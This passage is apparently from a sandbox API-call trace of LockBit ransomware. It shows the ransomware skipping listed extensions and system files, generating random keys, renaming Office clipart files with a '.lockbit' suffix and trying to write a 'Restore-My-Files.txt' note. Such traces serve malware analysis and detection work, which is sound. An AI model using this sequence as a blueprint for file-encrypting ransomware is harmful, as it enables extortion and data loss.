returned -1 [0165.245] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.246] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.246] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02446_.WMF") returned 1 [0165.247] lstrcmpiW (lpString1="ntldr", lpString2="NA02446_.WMF") returned 1 [0165.247] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02446_.WMF") returned 1 [0165.247] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02446_.WMF") returned -1 [0165.247] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02446_.WMF") returned -1 [0165.247] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02446_.WMF") returned 1 [0165.247] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02446_.WMF") returned -1 [0165.247] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.247] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02446_.WMF") returned=".WMF" [0165.247] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.247] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.247] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.248] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.248] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02446_.WMF.lockbit") returned 72 [0165.248] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02446_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02446_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.250] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.250] malloc (_Size=0x40068) returned 0x3df0008 [0165.250] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2612) returned 1 [0165.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.251] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.253] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02446_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02446_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.253] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.253] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.254] free (_Block=0x1fa2ed8) [0165.254] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02446_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.254] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.254] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.255] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02448_.WMF", cAlternateFileName="")) returned 1 [0165.255] lstrcmpiW (lpString1=".", lpString2="NA02448_.WMF") returned -1 [0165.255] lstrcmpiW (lpString1="..", lpString2="NA02448_.WMF") returned -1 [0165.255] PathFindExtensionW (pszPath="NA02448_.WMF") returned=".WMF" [0165.255] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.255] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.256] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.256] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.257] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.257] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.257] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.257] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.257] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.257] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.257] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02448_.WMF") returned 1 [0165.257] lstrcmpiW (lpString1="ntldr", lpString2="NA02448_.WMF") returned 1 [0165.257] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02448_.WMF") returned 1 [0165.257] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02448_.WMF") returned -1 [0165.257] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02448_.WMF") returned -1 [0165.257] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02448_.WMF") returned 1 [0165.257] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02448_.WMF") returned -1 [0165.257] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.257] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02448_.WMF") returned=".WMF" [0165.257] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.257] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.257] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.258] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.259] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.259] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02448_.WMF.lockbit") returned 72 [0165.259] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02448_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0165.267] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.267] malloc (_Size=0x40068) returned 0x1ff1e60 [0165.267] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2208) returned 1 [0165.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0165.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0165.268] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0165.270] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02448_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02448_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.270] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.270] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.272] free (_Block=0x1fa2ed8) [0165.272] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02448_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.272] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.272] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.272] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc28, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02450_.WMF", cAlternateFileName="")) returned 1 [0165.272] lstrcmpiW (lpString1=".", lpString2="NA02450_.WMF") returned -1 [0165.272] lstrcmpiW (lpString1="..", lpString2="NA02450_.WMF") returned -1 [0165.272] PathFindExtensionW (pszPath="NA02450_.WMF") returned=".WMF" [0165.272] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.272] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.272] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.273] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.273] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02450_.WMF") returned 1 [0165.274] lstrcmpiW (lpString1="ntldr", lpString2="NA02450_.WMF") returned 1 [0165.274] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02450_.WMF") returned 1 [0165.274] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02450_.WMF") returned -1 [0165.274] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02450_.WMF") returned -1 [0165.274] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02450_.WMF") returned 1 [0165.274] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02450_.WMF") returned -1 [0165.274] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.274] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02450_.WMF") returned=".WMF" [0165.274] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.274] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.275] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.275] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.276] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02450_.WMF.lockbit") returned 72 [0165.276] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02450_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02450_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0165.277] CreateIoCompletionPort (FileHandle=0x3cc, 